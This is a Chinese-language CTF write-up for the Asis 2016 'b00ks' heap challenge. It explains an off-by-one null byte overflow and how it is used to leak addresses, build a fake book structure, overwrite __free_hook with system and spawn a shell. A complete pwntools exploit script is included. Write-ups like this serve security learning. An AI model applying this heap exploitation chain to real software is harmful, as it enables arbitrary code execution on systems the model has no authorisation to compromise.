zoukankan      html  css  js  c++  java
  • Asis_2016_b00ks wp

    程序基本信息

    程序漏洞

    有一个读入函数,程序的所有输入都靠它读取,这个程序有个很明显的off_by_one漏洞,在输入时多输入一个0字符。

    利用思路

    程序开始运行时首先要求输入authorname,而这个输入保存在bss段0x0000559C506F3040处

    程序有创建函数可以分别给book_name与book_descrption创建堆保存内容,并还会创建一个book的堆来保存name和descrption的指针。

    book的指针保存在bss段0x0000559C506F3060处,距离authorname的保存位置有0x20个字节。

    攻击步骤:
    1、首先authorname输入0x20个字节,让多的一个0覆盖0x0000559C506F3060的最低位,也就是第一个book指针的最低位。
    2、然后创建一个book1,book1的指针会把最低位的0覆盖掉,同时authorname与book1指针直接连在一起,没有x00相隔,所以我们打印处authorname的时候就可泄露出book1的地址。(这里要把descrption堆的地址调成book1地址末位被0覆盖的地址,比如说book1地址为0x00007812,那descrption的地址要布置成0x00007810)
    3、创建一个book2,同时我们伪造一个book结构,通过编辑函数把这个book结构写入book1的descrption中,注意伪造的book要算好book1与book2之间的偏移,让伪造book的name和decrption指向book2的name和decrption。
    4、修改authorname输入0x20个字节,让多一个0覆盖掉book1指针的最低位,相当于此时book1的指针指向book1的descrption。
    5、这样我们通过打印book1的name和descrption即可泄露出book2的name与descrpiton地址。
    6、libc与book1descrption之间为固定偏移,由此我们可以获得libc基址、system函数地址、free_hook地址。
    7、编辑book1的descrption,让book2的descrption指向free_hook,编辑book2的descrption,让free_hook的值为system函数地址。
    8、创建一个堆写入"/bin/shx00",释放这个堆,运行system(“/bin/sh/x00")即可getshell。

    exp脚本

    我一开始用one_gadget没有打通,本机对所有one_gadget的限制条件都不满足,所以后来换成system的方式来getshell。

    from pwn import *
    
    context.log_level="info"
    #context.log_level='debug'
    binary=ELF("b00ks")
    libc=ELF("/lib/x86_64-linux-gnu/libc.so.6")
    io=process("./b00ks")
    
    
    def createbook(name_size,name,des_size,des):
    	io.readuntil("> ")
    	io.sendline("1")
    	io.readuntil(": ")
    	io.sendline(str(name_size))
    	io.readuntil(": ")
    	io.sendline(name)
    	io.readuntil(": ")
    	io.sendline(str(des_size))
    	io.readuntil(": ")
    	io.sendline(des)
    
    def printbook(id):
    	io.readuntil("> ")
    	io.sendline("4")
    	io.readuntil(": ")
    	for i in range(id):
    		book_id=int(io.readline()[:-1])
    		io.readuntil(": ")
    		book_name=io.readline()[:-1]
    		io.readuntil(": ")
    		book_des=io.readline()[:-1]
    		io.readuntil(": ")
    		book_author=io.readline()[:-1]
    	return book_id,book_name,book_des,book_author
    
    def createname(name):
    	io.readuntil("name: ")
    	io.sendline(name)
    
    def changename(name):
    	io.readuntil("> ")
    	io.sendline("5")
    	io.readuntil(": ")
    	io.sendline(name)
    
    def editbook(book_id,new_des):
    	io.readuntil("> ")
    	io.sendline("3")
    	io.readuntil(": ")
    	io.writeline(str(book_id))
    	io.readuntil(": ")
    	io.sendline(new_des)
    
    def deletebook(book_id):
    	io.readuntil("> ")
    	io.sendline("2")
    	io.readuntil(": ")
    	io.sendline(str(book_id))
    
    createname("A"*32)
    createbook(128,"a",32,"a")
    createbook(0x21000,"aaaa",0x21000,"bbbb")
    #gdb.attach(io)
    
    book_id_1,book_name,book_des,book_author=printbook(1)
    book1_addr=u64(book_author[32:32+6].ljust(8,'x00'))
    log.success("book1_address:"+hex(book1_addr))
    
    payload=p64(1)+p64(book1_addr+0x38)+p64(book1_addr+0x40)+p64(0xffff)
    editbook(book_id_1,payload)
    changename("A"*32)
    
    #gdb.attach(io)
    
    book_id_1,book_name,book_des,book_author=printbook(1)
    book2_name_addr=u64(book_name.ljust(8,"x00"))
    book2_des_addr=u64(book_des.ljust(8,"x00"))
    log.success("book2 name addr:"+hex(book2_name_addr))
    log.success("book2 des addr:"+hex(book2_des_addr))
    libc_base=book2_des_addr + 0x43ff0
    log.success("libc base:"+hex(libc_base))
    
    free_hook=libc_base+libc.symbols["__free_hook"]
    system_addr = libc_base + libc.symbols['system']
    one_gadget=libc_base + 0xe666b
    
    log.success("free_hook:"+hex(free_hook))
    log.success("one_gadget:"+hex(one_gadget))
    log.success('system:'+hex(system_addr))
    
    editbook(1,p64(free_hook)*2)
    editbook(2,p64(system_addr))
    
    createbook(8,'/bin/shx00',8,'/bin/shx00')
    #gdb.attach(io) 
    deletebook(3)
    
    io.interactive()
    
    
    

    参考

    pwn堆入门系列教程1
    ctfwiki 堆中的Off-By-One

  • 相关阅读:
    数据加密算法详解
    自定义标签+阻尼动画+圆角图片+titleBar随滑动渐隐和显示
    Android MVP Plugin,一键完成MVP结构代码编写
    jquery-validate校验
    C# 后台获取请求来源、文件下载
    【通用邮件发送】C# QQ 网易邮箱
    【asp.net mvc】 扩展 htmlhelper 实现分页
    在MVC5中使用Ninject 依赖注入
    c# txt 文件上传、写入TXT文件、创建图形验证码
    uploadify图片上传配置
  • 原文地址:https://www.cnblogs.com/luoleqi/p/11768032.html
Copyright © 2011-2022 走看看